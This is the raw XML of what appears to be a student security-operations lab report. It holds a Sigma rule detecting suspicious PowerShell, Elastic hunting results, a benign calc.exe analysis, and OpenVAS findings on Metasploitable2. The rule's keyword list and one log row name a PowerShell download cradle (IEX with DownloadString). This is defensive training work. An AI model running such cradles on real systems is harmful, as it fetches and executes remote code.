        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">title: Suspicious PowerShell Activity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">id: a1b2c3d4-e5f6-7890-abcd-ef1234567890</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">status: experimental</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">description: Detects suspicious PowerShell command execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">author: CYART Apprentice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">tags:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - attack.execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - attack.t1059.001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">logsource:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  category: process_creation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  product: windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">detection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  selection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    Image|endswith: '\\powershell.exe'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    CommandLine|contains:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      - '-Command'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      - '-EncodedCommand'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      - 'IEX'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      - 'Invoke-Expression'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      - 'DownloadString'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  condition: selection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">level: medium</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test command (harmless — run in Windows VM): powershell -Command "Write-Host Test"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Elastic Security — Threat Hunting Query Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Queried Elastic Security for Event ID 4688 (process creation) to identify PowerShell execution events. Results documented below:</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2400"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="12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Timestamp (UTC)</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Process</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Parent Process</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 Line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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MITRE Tech</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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2025-08-18 10:00:00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powershell.exe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cmd.exe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-Command Write-Host Test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T1059.001</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Test — benign execution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2025-08-18 10:02:14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powershell.exe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explorer.exe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-EncodedCommand [base64]</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T1059.001</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ALERT — encoded payload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2025-08-18 10:05:31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powershell.exe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svchost.exe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IEX (New-Object Net.WebClient).DownloadString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T1059.001</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ALERT — download cradle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 2: Malware Analysis Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: REMnux, Hybrid Analysis | Objective: Perform static and dynamic analysis on a benign sample (calc.exe) to understand analysis methodology.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Static Analysis — REMnux (strings command)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Command executed in REMnux:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">strings calc.exe &gt; output.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">cat output.txt | head -50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3 Interesting Strings Found in calc.exe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rPr>
          <w:tblHeader/>
        </w:trP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String</w:t>
            </w:r>
          </w:p>
        </w:tc>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6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Significance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Microsoft Corporation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Metadata</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Confirms legitimate Microsoft binary — check for spoofed versions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KERNEL32.dll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Import</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Windows core DLL — all processes import this; verify expected functions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Windows Calculator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PE Resource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Product name in version info — tampering would alter this field</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Static Analysis Summary (50 words): Analysis of calc.exe via REMnux strings command revealed expected metadata confirming it as a legitimate Microsoft binary. Key imports from KERNEL32.dll and USER32.dll indicate standard Windows GUI application behavior. No suspicious strings such as encoded payloads, unusual network addresses, or registry paths were identified, confirming the sample is benign.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamic Analysis — Hybrid Analysis Sandbox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Analysis Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="343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REMnux (Static)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="343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Hybrid Analysis (Dynamic)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Method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String extraction, PE header analysis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Live execution in isolated sandbox</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Network Activity</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Not observable statically</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No outbound connections — confirmed benign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Registry Changes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Not observable statically</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No registry modifications detected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File System</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Import table reveals file APIs</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No file writes outside temp directory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Verdict</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Benign — no suspicious strings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Benign — clean behavior in sandbox</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Advantage</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Fast; no execution risk</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Reveals actual runtime behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 3: Vulnerability Management Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: OpenVAS, DefectDojo | Objective: Scan Metasploitable2, import results into DefectDojo, prioritize vulnerabilities, and create a remediation plan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenVAS Scan Results — Metasploitable2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Full port/vulnerability scan performed against Metasploitable2 (192.168.1.200). Top vulnerabilities identified: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200"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="36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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>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CVSS</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CVE</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Port/Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VSFTPD 2.3.4 Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">21/FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Backdoor in VSFTPD allows unauthenticated remote root shell via port 6200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba MS-RPC Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">9.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2007-2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">445/SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba username map script allows arbitrary command execution as root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">UnrealIRCd Backdoor</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">7.5</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2010-2075</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6667/IRC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">UnrealIRCd contains a DEBUG3_DOLOG_SYSTEM backdoor callable remotely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Distcc RCE</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6.8</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2004-2687</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3632/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Distcc distributed compiler allows unauthenticated code execution</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2F2F2F"/>
